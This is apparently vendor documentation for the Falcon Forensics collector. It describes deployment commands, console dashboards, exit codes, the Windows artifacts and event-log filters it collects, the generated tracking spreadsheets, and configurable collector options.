RUN the following in the Edit and run scripts tab of RTR.

/path/to/executable -cid <CID with checksum>

If a proxy is needed, run this instead.

HTTPS_PROXY=proxypath /path/to/executable -cid <CID wih Checksum>

Specify a timeout. For example, an hour would be Timeout=3600.

Note: The default is 90 seconds which is not enough time to complete the collection.

Ensure that Falcon Forensics is running

Run the following command to confirm that Falcon Forensics is running on a macOS or Linux machine.

ps -e | grep ffc

Note: If you change the name of the collector executable before executing, the process name changes as well, so modify your ps command to reflect that change.

For Windows, use the Get-Process command in Powershell or open the machine’s Task Manager to confirm Falcon Forensics is running.

Forensics dashboards

Forensics dashboards include these features:

Data for child CIDs from the associated parent CID.
Fast rendering and informative dashboards.
Improved usability through drill-downs, parameters, filtering, and interactions.
Intuitive visualizations including graphs, charts, and maps.
Live view option for real-time updating of information.

The parent CID must have a Falcon Forensics subscription to collect and route forensics data and for users to see child CID data.

For more information about creating queries using CrowdStrike Query Language (CQL), see Learn the CrowdStrike Query Language Using Falcon Data.

View deployment status

From the Falcon console, go to Endpoint security > Forensics > Deployment status .
Optional. To narrow the results, enter parameters and click Apply.
Click an element to view details for hosts.

View File event log

From the Falcon console, go to Endpoint security > Forensics > File event log .
Optional. To narrow the results, enter parameter values.
Click Apply.
Scroll down to view the Event Timeline.
Continue scrolling to view the Host File Inventory and Critical Files panels. These panels include four data fields:
1. IOC Type: Classification of the method used.
2. Custom IOC Severity: Indicates the level of threat severity for the event.
3. Confidence: The level of confidence that this event indicates for a threat.
4. Threat Type: Classification of the potential threat.
  
  Note: All columns are visible, however, if you don’t have Falcon Intelligence, Threat Types will remain blank and the drill-down menu associated with intel correlation and the custom IOCs page won’t work. When populated, you can click the field value to drill down for more event details.
Click an event to view more details.

View Host event info

From the Falcon console, go to Endpoint security > Forensics > Host info .
Optional. To narrow the results, enter parameters and click Apply.
Continue scrolling to view these panels:
- Events
- Users
- Process Info
- Networked Process Info
- Network Interfaces
- Windows
- IOC File Overview
- Host File Overview
- Suspicious File Overview
- Critical File Overview
Click an element to view details for specific hosts, users, or events.

View Host timeline

From the Falcon console, go to Endpoint security > Forensics > Host timeline .
Fill out the form and click Submit.

View Windows hunting leads

From the Falcon console, go to Endpoint security > Forensics > Windows hunting leads .
Fill out the form and click Submit.
For each element, you can click View in Advanced event search or Export.

View the browser hunting dashboard

The Browser hunting dashboard provides visibility into events based on user, device, and browser information. You’ll no longer need to create queries and export results to access this data. To view the dashboard, go to Endpoint security > Forensics > Browser hunting .

To narrow your results, apply a filter using any of the available parameters such as company, user name, or platform. You can export any parts of the dashboard data at any time.

Note: To prevent the potential collection of personal information, browser data collection is disabled by default. Contact support to have it enabled.

Forensics event search

Search Forensics events by visually building queries. These searches help you quickly collect information during incident triage and hunting. Go to Endpoint security > Forensics > Event search .

Forensics advanced event search

Get direct access to sensor-aligned Forensics data that is combined with Investigate and XDR data to enable you to search for events with the Advanced event search page. Quickly collect information during incident triage and hunting and query for events using CQL. To view, manage, and investigate the events in the Falcon console, go to Endpoint security > Forensics > Advanced event search .

For more information, see Advanced Event Search.

Exit codes

When the application ends, it provides an exit code that can be used to determine why it exited.

Code	Reason	Explanation
0	-	No error, success.
1	-	Errors other than those below.
2	-	Missing required parameters, Invalid Log Level, Missing CID,CID Not Matched, Requested Help info
3	-	Connect Request timed-out, Connect Request Refused.
-1 0xffffffff 4294967295	Collector is still running	When the collector is started, the ExitCode registry value is set to one of the three codes, depending on what application, tool, or script is used to interpret that value and what form it is displayed. These are normal and expected values. -1 (signed 32-bit decimal) 0xffffffff (32-bit hex) 4294967295 (unsigned decimal)
413	File size too big	The file being uploaded to the cloud is too large (offline collection only)

Forensics data field definitions

For information about collected fields, see Events Full Reference (Events Data Dictionary). To learn how to query data, see Forensics Collector query sheet.

Artifacts collected by Falcon Forensics

Field	Definition
amcache	The AmCache is an artifact that stores metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and above. File hash is not calculated for files larger than 20MB.
browser (optionally collected)	User browser history artifacts such as URLs, visit counts, and whether the webpage was navigated to by typing the address into the address bar.
dirlist	Directory listing and file metadata artifacts are collected for files and directories that match the following conditions. All files up to 15 directories deep recursively for the system drive, excluding files with the following file extensions: .exe,.dll,.sys,.acm,.ax,.cpl,.drv,.efi,.ocx,.scr,.tsp,.mui,.rs,.ime,.rll,.tsp,.com,.lnk,.pst,.fba,.manifest,.lmetadata,.png,.jpg,.cat,.dep,.bnk,.mum,.xrm- ms,.cdf- ms,.resx,.cdxml,.adml,.pri,.wem,.animset,.asset,.hpp,.markup,.dds,*.wav, and no file extension. File hash is not calculated for files larger than 5MB. Collected entries will be limited to the first 500,000 files fitting the previous conditions. All Portable Executables files up to 15 directories deep recursively for the system drive. File hash (sha1 and sha256) is not calculated for files larger than 20MB. Collected entries will be limited to the first 100,000 files fitting the previous conditions.
drives	Details on all disks mounted on the system.
drivers	Windows driver artifacts to include name of module and other details. File hash is not calculated for files larger than 20MB.
env	Environment variable artifacts.
events	Capture event log entries matching the following conditions.

Event log source

Event Log Source	Filter events occurring in the last # days	Maximum number of event entries processed	Filter
Application	1825	5000	None
Security	1825	5000	None
System	1825	5000	None
`%windir%\System32\winevt\Logs\Symantec Endpoint Protection Client.evtx`	1825	5000	(EVENTID==51 or EVENTID==45)
`%windir%\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx`	1825	5000	EVENTID==3004
`%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx`	1825	5000	(EVENTID==21 or EVENTID==22 or EVENTID==24 or EVENTID==1101 or EVENTID==23 or EVENTID==25)
`%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx`	1825	5000	EVENTID==1158
`%windir%\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx`	1825	5000	(EVENTID==106 or EVENTID==200 or EVENTID==102 or EVENTID==141 or EVENTID==201) and (TEXT like '\At')
`%windir%\System32\Winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx`	1825	5000	(EVENTID==4104 and LEVEL eq 'WARNING')
`%windir%\System32\Winevt\Logs\Windows Powershell.evtx`	1825	5000	(EVENTID==400 or EVENTID==403 or EVENTID==600) AND ('rundll32' in TEXT OR 'powershell' in TEXT)

regdump

Field	Definition
files	Collect artifacts showing a high level roll up of files counts per extension per directory.
groups	Windows user group information.
jobs	Windows ‘At’ job information.
link	Collect LNK file artifacts up to 15 directories deep recursively for the root of the system drive. File hash is not calculated for files larger than 20MB.
mal	Collect information that might uncover instances of dll hijacking or Windows ‘sticky key’ abuse. Artifacts up to 15 directories deep recursively for the root of the system drive will be processed.
magic	Collect information about files with unexpected ‘magic’ file header byte signatures. All Portable Executables files up to 15 directories deep recursively for the system drive will be processed. File hash is not calculated for files larger than 20MB.
mft	Collect information about deleted MFT file records for files created in the last 365 days.
network	Collect network information: system network addresses, netstat, arp, dns, host file, and route table information.
peinfo	Extracts and collects portable executable (PE) header information from all Portable Executables files with a *.exe extension up to 15 directories deep recursively for the system drive will be processed.
pipes	Collects system named pipe information.
prefetch	Extract Windows prefetch information.
pslist	Collect system process listing information. File hash is not calculated for files larger than 20MB.
recentfiles	Extract Windows recent file cache (RecentFilepath.bcf) information. File hash is not calculated for files larger than 20MB.
regdump	Collect registry key information from the following registry keys recursively. HKLM represents the HKEY Local Machine registry hive, and HKAU is a pseudo key representing all users HKEY Users registry hive.

regdump registry entries

HKLM\SOFTWARE\Microsoft\Windows\
- Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\
- Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Classes\Local Settings\Software\Microsoft
HKLM\SECURITY\Policy
HKLM\SYSTEM\CurrentControlSet\Control\
WMI, Class, Notifications, NetDiagFX, Power
HKLM\SYSTEM\CurrentControlSet\Services
HKAU\SOFTWARE\Microsoft
HKAU\SOFTWARE\Classes\LocalSettings\Software\Microsoft
HKAU\SOFTWARE\Wow6432Node\Microsoft
HKAU\SOFTWARE\Classes\*\shellex
HKAU\SOFTWARE\LANDesk\Inventory\LogonHistory\Logons
HKAU\SOFTWARE\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Bookmarks
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Interface\Explorer"
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\LastFingerprints
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\LifetimeCounters
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\PeriodCounters
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\SshHostKeys
HKAU\SOFTWARE\Sysinternals
HKAU\SOFTWARE\WinRAR\DialogEditHistory
HKAU\SOFTWARE\Wow6432Node\LANDesk\Inventory\LogonHistory\Logons
HKAU\SOFTWARE\Wow6432Node\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
HKAU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKAU\Software\7Zip
HKAU\Software\ATERA Networks\AlphaAgent\
HKAU\Software\AppDataLow\Software\Microsoft
HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsTime
HKAU\Software\Classes\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount
HKAU\Software\Famatech\advanced_port_scanner
HKAU\Software\FileZillaPo\PuTTY\SshHostKeys
HKAU\Software\Nico Mak Computing\WinZip
HKAU\Software\SimonTatham\PuTTY
HKAU\Software\WinRAR\ArcHistory
HKAU\Software\Wow6432Node\7Zip

regfile

Collect references to files within the registry keys matching the specified conditions. HKLM represents the HKEY Local Machine registry hive, and HKAU is a pseudo key representing all users HKEY Users registry hive. File hash is not calculated for files larger than 20MB.

regfile registry entries

HKLM\SOFTWARE\Microsoft\Windows\
- Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Microsoft\Windows NT\
- Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\
- Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\
CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
HKLM\SOFTWARE\Classes\LocalSettings\Software\Microsoft\
HKAU\SOFTWARE\Microsoft\Windows\
HKAU\SOFTWARE\Microsoft\Windows NT\
HKAU\SOFTWARE\Wow6432Node\Microsoft\
HKAU\SOFTWARE\Wow6432Node\Microsoft NT\
HKAU\SOFTWARE\Classes\LocalSettings\Software\Microsoft

Artifacts

Field	Definition
services	Collect Windows Services enumeration information. File hash is not calculated for files larger than 20MB.
shares	Collect Windows network share information.
shellbags	Extract registry shell bag MRU.
shim	Extract Shim Cache information. File hash is not calculated for files larger than 20MB.
superfetch	Extract superfetch database file.
tasks	Collect Windows scheduled task information using both the Task Scheduled 1.0 and 1.2/2.0 interface.
UAL	Collect User Access Logging information. UAL is a feature in Windows Server that aggregates client usage data by role and products on a local server. It helps quantify requests from client computers for roles and services on a local server.
USB	Extracts USB device enumeration information.
userassist	Extracts UserAssist registry entry information.
users	Collects Windows users information.
webshell	Identifies Windows webshell script files. Identified files must have a minimum size of 64 bytes.
wmi	Collects WMI information by issuing the defined WMI queries.

Windows Management Instrumentation (WMI) query

Query	Namespace
`SELECT * FROM __EventConsumer`	`Root\Subscription`
`SELECT * FROM __EventFilter`	`Root\Subscription`
`SELECT * FROM __FilterToConsumerBinding`	`Root\Subscription`
`SELECT * FROM AntiVirusProduct`	`Root\SecurityCenter2`
`SELECT * FROM AntiVirusProduct`	`Root\SecurityCenter`

Run collectors on network-contained hosts

The Falcon Forensics Collector relies on domain name resolution (DNS) to connect to the Falcon Cloud to upload its collected data. To resolve the domain name and upload data from a host that is network-contained by the Falcon sensor, add the cloud-specific static IP's for Falcon Forensics to the Falcon Containment Policy. For a list of IPs, see Falcon Forensics.

Understand generated spreadsheets

Falcon Forensics creates spreadsheets so you can track its progress across your chosen hosts. This is described in Deploy Falcon Forensics to hosts.

FalconDeploy_{FileDateTime}.csv

This document is automatically generated during the deployment of Falcon Forensics. The following is a description of important fields and columns found in it.

Field	Definition
`batch_id`	Created every time that a request is made, for up to 500 devices. If you have more than 500 devices, you would see two different batch_id numbers, when it reaches 500 devices. So device 501 would have the new batch_id, as would 1001, if you requested that many.
`aid`	The individual identifier for a host. Depending on the context, this might also be referred to as `device_id` or `host_id`. PSFalcon generally uses the name `HostId` or `HostIds` when looking for this field.
`session_id`	The individual session for that device id (aid)
`cloud_request_id`	The individual command request that is associated with the session. `cloud_request_id` is the unique value in the spreadsheet (`aid`, `session_id`, and `batch_id` are likely to be repeated).

For each one of the cloud_request_id’s there will be an associated complete status. It will either show TRUE or FALSE depending on whether or not the command was issued to the host.

If the command was SUCCESSFUL, you will see a value in the stdout (standard output) field.
If the command produced an ERROR, you will see a value in the stderr (standard error) field.

Note: If complete is FALSE and offline_queued is TRUE, you will not see any information in the stdout or stderr columns because the host has not received those commands yet.

A successful run of the script has three cloud_request_ids for each individual host.

C:\ The session was initialized (deployment_step: session_start)
Operation completed successfully. The executable was placed on the host (deployment_step: put_file)
The process was successfully started. The executable was successfully launched (deployment_step: run_file)

FalconQueue_{FileDateTime}.csv

This document collects information for all sessions that have commands queued up. The following is a description of important fields and columns found in it.

Field	Definition
`aid`	The individual identifier for a device. Depending on the context, this might also be referred to as `device_id` or `host_id`. PSFalcon generally uses the name `HostId` or `HostIds` when looking for this field.
`session_id`	The individual session for a device (aid).
`cloud_request_id`	the unique individual command request that is associated with the session.
`session_created_at`	When the initial interaction with the computer was made.
`session_deleted_at`	Gets populated if that session has been manually deleted, the session has fully completed, or 7 days passed after the session was created and the target device never came online (leading to queue time expiration). When a session has completed, it will show a `session_status` of FINISHED.
`session_updated_at`	Gets updated as you add additional commands to a session, or if the device comes online and begins the session and processes associated commands.
`command_complete`	This is for each individual command. Processed commands will have a status of TRUE. This does not indicate success, only that the command was executed.
`command_deleted_at`	Only gets populated if someone chooses to delete a specific command that was called for a given session.
`base_command and command_string`	These correlate to each other. The `base_command` displays the specific command, while the `command_string` shows the `base_command` plus any additional parameters.
`command_status`	Provides the status of a given command. When a command is queued up, it will show INITIALIZED. When it has been processed and completed, it will display FINISHED. Note: If a command has a `command_deleted_at` value, the `command_status` value might no longer be reliable.

For new sessions that are created, meaning Invoke-FalconDeploy was run and then Get-FalconQueue was run, when you immediately open the FalconQueue csv, there is some specific information you should see.

session_status of PENDING
command_complete of FALSE
Unique cloud_request_ids
command_deleted_at information will only show if someone chose to delete a specific command in a session
base_command of “put”
- associated command_string of “put <executable name>”
- base_command of “run”
- associated command_string of “run <executable name>”
- command_status of INITIALIZED

FFC_Reg_Values.csv

This file contains information from only one command being run and verifies the executable has finished running on a given host and that it has completed successfully. You can use the information in this file to help troubleshoot why a computer is not successfully completing a Falcon Forensics scan.

Field Definition

session_id The individual session for a device id (aid).

stdout

When the command is successful, or the complete status shows TRUE, you will get stdout (standard output) information. Expand this cell to view all of the information contained in it.

ExitCode value of 0 means the executable has successfully run.
If you do not get an ExitCode of 0, you can reference the Exit Codes on pages 18-20 to learn more about what the shown exit code means.
The Start and Stop information captures when it started to run and when it stopped running.
CU is the equivalent to your CID UploadCount should be 1.
Uploaded should display a time so that you know data was collected and uploaded.

Falcon Forensics Collectors

Learn how to configure collectors in Falcon Forensics.

Overview

A configuration is a collection profile that gathers specific artifacts on Windows, Mac, and Linux platforms. A configuration contains settings and specifies one or more collectors. A collector is an executable script package that defines the data that will be collected.

This page lists all available collectors. It also details generated events, default settings, configurable options, and examples.

Get started

If you are a new Falcon Forensics customer, you can start creating collections and configurations immediately. Existing customers must choose to opt in to use customizable collections.

Go to Endpoint security > Forensics > Forensics Collections .
Click Create collection.
In the Opt-in notification, type OPT-IN into the text box. Then click Opt-in.

Note: Existing customers can choose to opt in or opt out for the next 90 days. On Tuesday, December 9, 2025, all customers will be automatically opted in to the new collections and Forensics executable behaviors.

For info related to opting in to customizable collections, creating collections, and creating configurations, see the following.

Create a collection
Create a configuration

Windows collectors

About file operations

When configuring Windows collections that involve file operations, it is important to understand the purpose of each available option. Some options are mutually exclusive. This is a multi-select field.

Standard file information

NAME: The file's name.
SIZE: The file's size in bytes.
ATTRIBUTES: The file's attributes.

Timestamp and identifier information

CAM: The times the file was created, accessed, and modified.
FILEID: A unique file identifier, combining volume ID and file ID.
INDX: NTFS INDX buffer timestamps (specifically, FILE_NAME MACB).
MFT: NTFS MFT FILE record timestamps (FILE_NAME and STANDARD_INFORMATION MACB).
XACCESSED: Excludes the last accessed timestamp from collection.

Security and ownership details

CERTS: Reports and validates digital certificates.
PECERTS: Reports and validates digital certificates only for Portable Executable (PE) files.
OWNER: The account name of the file's owner.
SID: The Security Identifier (SID) of the file’s owner.
XGOODCERTS: Excludes files that have correct digital signatures.

File property and hashing

PROPERTIES: Collects file properties, such as version and company information.
MD5: Collects the MD5 hash of the file.
SHA1: Collects the SHA1 hash of the file.
SHA256: Collects the SHA256 hash of the file.

Behavioral and exclusion options

PEONLY: This option ensures that file operations are skipped if the file is not in PE format.
PRIVBACKUP: Enables or revokes SeBackupPrivilege during the collection process.
XDIR: Excludes directories from the collection.
XFILE: Excludes non-directories from the collection. Only directories are collected.
XOFFLINE: Ignores files with attributes that indicate that data that isn't immediately available. For example:
- FILE_ATTRIBUTE_OFFLINE
- FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS
- FILE_ATTRIBUTE_RECALL_ON_OPEN
XREPARSE: Ignores files with the FILE_ATTRIBUTE_REPARSE_POINT attribute.
XSPARSE: Ignores files with the FILE_ATTRIBUTE_SPARSE attribute.
XUNC: Ignores UNC network share paths. This does not apply to long paths or NT extended paths.

Important considerations

Mutual exclusivity: The XDIR and XFILE options are mutually exclusive. Using both simultaneously results in no data being collected by that particular collector.
Performance impact: The following options involve reading directly from the file, which may increase collection time: CERTS, FILEID, INDX, MFT, OWNER, PCERTS, PEONLY, PROPERTIES, MD5, SHA1, SHA256, SID, XGOODCERTS.
FfcFileIdentifier generation: For FfcFileIdentifier to be generated, you must turn on FILEID.

Collects information about Alternate Data Streams (ADS) in files with customizable filtering, recursion options, and detailed file attributes. This collector is not in the default configuration.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path you need to scan.	No
File Operations	Multiple selection	The file operations to include in this collection.	No
Exclude Filter	Regex	Path exclusion regex filter pattern.	No
Include Filter	Regex	Path inclusion regex filter pattern.	No
Avoidance Filter	Regex	Excludes specified paths from processing. Any directory matching this filter will be skipped entirely during collection.	No

Amcache

Amcache registry hive entry, which contains metadata related to Windows Portable Executable (PE) binary image execution and program installation.

Events generated

AmcacheEntry: Metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and later.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan.	No
File Operations	Multiselect	The file operations to include in this collection.	Yes. all,xoffline,xreparse,xsparse
Exclude Zero Size Files	Boolean	Only record files with non-zero size	No
Skip Hashing Above Size	Integer	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 20MB
Skip Hashing Below Size	Integer	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

BAM

Gathers Background Activity Moderator (BAM) registry entry.

Events generated

BamRegAppRunTime: Recent program execution timeline from Background Activity Moderator (BAM) system service registry. BAM key is written on system shutdown.

RecentExecutionTimestamp: Recent execution timestamp from a Forensics artifact.

Configurable options

Option

Type

Description

In default configuration?

File Operations

Multiple selection

The file operations to include in this collection.

Yes.

attributes, cam, certs, fileid, name, owner, privbackup, properties, sha1, sha256, sid, size, xoffline, xreparse.

Skip Hashing Above Size

Integer

Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

Skip Hashing Below Size

Integer

Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

BITS

Gathers information from the Windows Background Intelligent Transfer Service (BITS).

Events generated

BITSJobInfo: Background Intelligent Transfer Service (BITS) job information.

BITSJobFileInfo: Background Intelligent Transfer Service (BITS) job file information.

BITSJobMetadata: Background Intelligent Transfer Service (BITS) job metadata, such as times, proxy.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan.	No
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No
File Operations	Multiple selection	The file operations to include in this collection.	No

Browser

Gathers browser-based artifacts.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension or browser add-on information.

BrowserHistoryVisit: Information about a browser history entry.

Configurable options

Option	Type	Description	In default configuration?
Browser type	Multiselect	Browsers that will be parsed by this collector.	Yes. All
Maximum entries	Integer	Maximum number of records collected per browser, per event.	Yes. 1,000
After date	Date	Time picker that only gather records after set date.	No
Days to include	Integer	Number of days to look back.	No
Ascending order	Boolean	Gather results in ascending order instead of descending.	No
Copy database	Boolean	Make a temporary copy of the browser database. This can avoid an issue with the database being locked if the browser is open.	No
Exclude non-HTTP URLs	Boolean	For Internet Explorer 10 and 11, exclude non-HTTP URLs.	No
Exclude web data	Boolean	For Internet Explorer 10 and 11, exclude HTTP and HTTPS URLs from history.	No
Only servers	Boolean	Restrict collection to only include servers and domain controllers.	No

DataStore

Processes Windows Update history stored in the DataStore.edb file.

Events generated

OsUpdateTimestamp: Details about an operating system update.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan.	No. Collector defaults to %SystemRoot%\SoftwareDistribution\DataStore
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
File Operations	Multiple selection	The file operations to include in this collection.	No
Page Size	Integer	Use provided ESE Jet database engine page size (bytes), instead of default.	No

Defender

Pulls Defender threat and detection details, also gathers dirlist related events for detected and threat files.

Events generated

MpThreat: Microsoft Protection Threat, information about the threat identified by Defender.

MpThreatDetection: A detection from the Microsoft Protection, also known as Defender.

MpThreatAction: Report when a particular threat action type has occurred.

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan.	No
Collect Detection History	Boolean	Enables collection of Windows Defender detection history.	No
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
File Operations	Multiple selection	The file operations to include in this collection.	Yes. Attributes, cam, fileid, name, owner, privbackup, sha1, sha256, sid, size, xoffline, xreparse, xsparse

DefenderWMI

Collect Windows Defender generated threats and detections using WMI queries.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

MpThreatWMI: Microsoft Protection Threat, information about the threat identified by Defender, gathered using WMI.

MpThreatDetectionWMI: A detection from the Microsoft Protection, also known as Defender, gathered using WMI.

MpThreatAction: Report when a particular threat action type has occurred.

Configurable options

Option

Type

Description

In default configuration?

File Operations

MultiSelect

File operations to include in this collection

Yes.

Attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

DirList

Collects a list of files and sub-directories and provides details about each file.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan.	No. Collector defaults to %systemdrive%
Include details of initial directory	Boolean	Includes detailed information about the starting directory.	No
Scan All Drives	Boolean	Enumerate all fixed drives and substitute each in `<path>`.	No
Maximum Entries	Integer	Maximum number of entries to collect.	Yes. 500,000 for non-portable executables. 100,000 for portable executables
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, fileid, name, owner, privbackup, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Exclude Filter	String	Regular expression pattern for excluding paths.	Yes. non-portable executable collector uses "\.(exe
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	Yes. 15
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Include Top-Level Directory Details	Boolean	Includes detailed information about top-level directories.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 5 for non-portable executable, 20 for portable executable
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Drives

Generates a list of all disks and the FsVolumeMounted event.

Events generated

FsVolumeMounted: Information about a volume that was just mounted.

Configurable options

None

Drivers

Provides information about driver files.

Events generated

DriverLoad: Information on a loaded driver.

Configurable options

Option

Type

Description

In default configuration?

File Operations

Multiple selection

The file operations to include in this collection.

Yes.

attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Skip Hashing Above Size

String

Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

Yes.

20MB

Skip Hashing Below Size

String

Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

Env

Collects information about all system variables and current user variables.

Events generated

RuntimeEnvironmentVariable: In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.

Configurable options

None

Events

Collects events from Windows Event logs.

Events generated

LogEntry: Information about a log entry observed on an endpoint.

Configurable options

Option	Type	Description	In default configuration?
Process Application event log	Boolean	Enables collection from Application event log.	Yes
Process Security event log	Boolean	Enables collection from Security event log.	Yes
Process System event log	Boolean	Enables collection from System event log.	Yes
Custom Log Name	String	Specify additional event logs to collect.	Yes. See Default configuration collection examples.
Filter Expression	String	Use logical expressions to filter event messages.	Yes. See Default configuration collection examples.
Exclude Full Text	Boolean	Excludes full message text from collection.	No
Help Tag	String	Help tag that describes the event filter.	Yes. See Default configuration collection examples.
Event ID Mask	Integer	Filter for specific Event IDs.	Yes
Maximum Entries	Integer	Maximum number of events to collect.	Yes. 5000
Days to Report	Integer	Number of days of events to collect.	Yes. 1825
Event Source	String	Filter events by specific source.	No
Output Name/Value Pairs	Boolean	Outputs event data in name or value pair format.	Yes
Before Date	Date	Collect events before specified date (mm/dd/yyyy).	No
After Date	Date	Collect events after specified date (mm/dd/yyyy).	No

Default configuration collection examples

Antivirus events

Option	Value
Custom Log Name	`%windir%\System32\winevt\Logs\Symantec Endpoint Protection Client.evtx`
Filter Expression	`(EVENTID==51 or EVENTID==45)`
Help Tag	`AV`

Option	Value
Custom Log Name	`%windir%\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx`
Filter Expression	`EVENTID==3004`
Help Tag	`AV`

Remote Desktop Protocol (RDP) events

Option	Value
Custom Log Name	`%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx`
Filter Expression	`(EVENTID==21 or EVENTID==22 or EVENTID==24 or EVENTID==1101 or EVENTID==23 or EVENTID==25)`
Help Tag	`RDP`

Option	Value
Custom Log Name	`%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx`
Filter Expression	`EVENTID==1158`
Help Tag	`RDP`

Task scheduler events

Option	Value
Custom Log Name	`%windir%\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx`
Filter Expression	`(EVENTID==106 or EVENTID==200 or EVENTID==102 or EVENTID==141 or EVENTID==201) and (TEXT like '\At')`
Help Tag	`TaskScheduler`

PowerShell events

Option	Value
Custom Log Name	`%windir%\System32\Winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx`
Filter Expression	`(EVENTID==4104 and LEVEL eq 'WARNING')`
Help Tag	`PowerShell`

